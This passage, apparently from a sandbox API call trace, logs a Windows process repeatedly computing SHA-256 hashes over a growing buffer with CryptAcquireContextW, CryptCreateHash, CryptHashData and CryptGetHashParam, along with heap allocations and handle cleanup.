dwFlags=0x0) returned 1 [0119.216] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.216] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45a10 [0119.216] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45a10, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45a10, pdwDataLen=0xceadc) returned 1 [0119.216] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.216] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.216] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.217] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.217] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0119.217] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.217] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45500 [0119.217] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45500, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45500, pdwDataLen=0xceadc) returned 1 [0119.217] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.217] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.217] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.217] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.217] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0119.217] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.217] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45950 [0119.217] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45950, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45950, pdwDataLen=0xceadc) returned 1 [0119.218] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.218] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.218] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.218] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.218] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x600, dwFlags=0x0) returned 1 [0119.218] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.218] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45a40 [0119.218] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45a40, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45a40, pdwDataLen=0xceadc) returned 1 [0119.218] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.218] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.218] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.219] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.219] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x620, dwFlags=0x0) returned 1 [0119.219] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.219] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45860 [0119.219] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45860, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45860, pdwDataLen=0xceadc) returned 1 [0119.219] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.219] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.219] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.220] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.220] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x640, dwFlags=0x0) returned 1 [0119.220] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.220] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45980 [0119.220] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45980, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45980, pdwDataLen=0xceadc) returned 1 [0119.220] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.220] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.220] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.220] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.220] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x660, dwFlags=0x0) returned 1 [0119.220] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.220] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45a70 [0119.221] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45a70, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45a70, pdwDataLen=0xceadc) returned 1 [0119.221] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.221] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.221] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.221] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.221] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x680, dwFlags=0x0) returned 1 [0119.221] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.221] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45b60 [0119.221] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45b60, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45b60, pdwDataLen=0xceadc) returned 1 [0119.221] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.221] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.221] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.222] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.222] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0119.222] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.222] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45920 [0119.222] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45920, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45920, pdwDataLen=0xceadc) returned 1 [0119.222] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.222] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.222] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.223] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.223] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0119.223] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.223] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e459b0 [0119.223] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e459b0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e459b0, pdwDataLen=0xceadc) returned 1 [0119.223] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.223] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.223] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.223] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.223] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0119.223] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.224] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45620 [0119.224] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45620, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45620, pdwDataLen=0xceadc) returned 1 [0119.224] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.224] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.224] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.224] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.224] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x700, dwFlags=0x0) returned 1 [0119.224] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.224] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45890 [0119.224] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45890, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45890, pdwDataLen=0xceadc) returned 1 [0119.224] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.224] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.224] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.225] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.225] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x720, dwFlags=0x0) returned 1 [0119.225] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.225] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45560 [0119.225] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45560, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45560, pdwDataLen=0xceadc) returned 1 [0119.225] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.225] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.225] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.226] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.226] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x740, dwFlags=0x0) returned 1 [0119.226] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.226] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45aa0 [0119.226] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45aa0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45aa0, pdwDataLen=0xceadc) returned 1 [0119.226] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.226] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.226] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.226] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.226] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x760, dwFlags=0x0) returned 1 [0119.226] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.226] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45bc0 [0119.226] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45bc0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45bc0, pdwDataLen=0xceadc) returned 1 [0119.226] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.226] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.226] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.227] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.227] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x780, dwFlags=0x0) returned 1 [0119.227] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.227] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45650 [0119.227] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45650, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45650, pdwDataLen=0xceadc) returned 1 [0119.227] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.227] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.227] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.228] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.228] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0119.228] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.228] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45530 [0119.228] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45530, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45530, pdwDataLen=0xceadc) returned 1 [0119.228] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.228] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.228] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.228] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.228] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0119.228] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.228] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45590 [0119.229] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45590, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45590, pdwDataLen=0xceadc) returned 1 [0119.229] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.229] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.229] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.229] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.229] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0119.229] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e456b0 [0119.229] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e456b0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e456b0, pdwDataLen=0xceadc) returned 1 [0119.229] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.229] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.229] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.230] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.230] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x800, dwFlags=0x0) returned 1 [0119.230] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.230] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e456e0 [0119.230] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e456e0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e456e0, pdwDataLen=0xceadc) returned 1 [0119.230] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.230] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.230] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.231] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.231] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x820, dwFlags=0x0) returned 1 [0119.231] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.231] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45bf0 [0119.231] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45bf0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45bf0, pdwDataLen=0xceadc) returned 1 [0119.231] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.231] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.231] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.232] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.232] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x840, dwFlags=0x0) returned 1 [0119.232] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.232] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45710 [0119.232] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45710, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45710, pdwDataLen=0xceadc) returned 1 [0119.232] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.232] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.232] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.233] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.233] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x860, dwFlags=0x0) returned 1 [0119.233] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.233] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e457d0 [0119.233] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e457d0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e457d0, pdwDataLen=0xceadc) returned 1 [0119.233] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.233] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.233] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.234] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.234] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x880, dwFlags=0x0) returned 1 [0119.234] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e458c0 [0119.234] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e458c0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e458c0, pdwDataLen=0xceadc) returned 1 [0119.234] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.234] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.234] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.234] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.234] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0119.235] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45ad0 [0119.235] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45ad0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45ad0, pdwDataLen=0xceadc) returned 1 [0119.235] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.235] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.235] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.235] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.235] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0119.235] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.235] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45740 [0119.235] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45740, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45740, pdwDataLen=0xceadc) returned 1 [0119.235] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.235] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.235] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.236] CryptCreateHash (in: hProv=0x727e70, 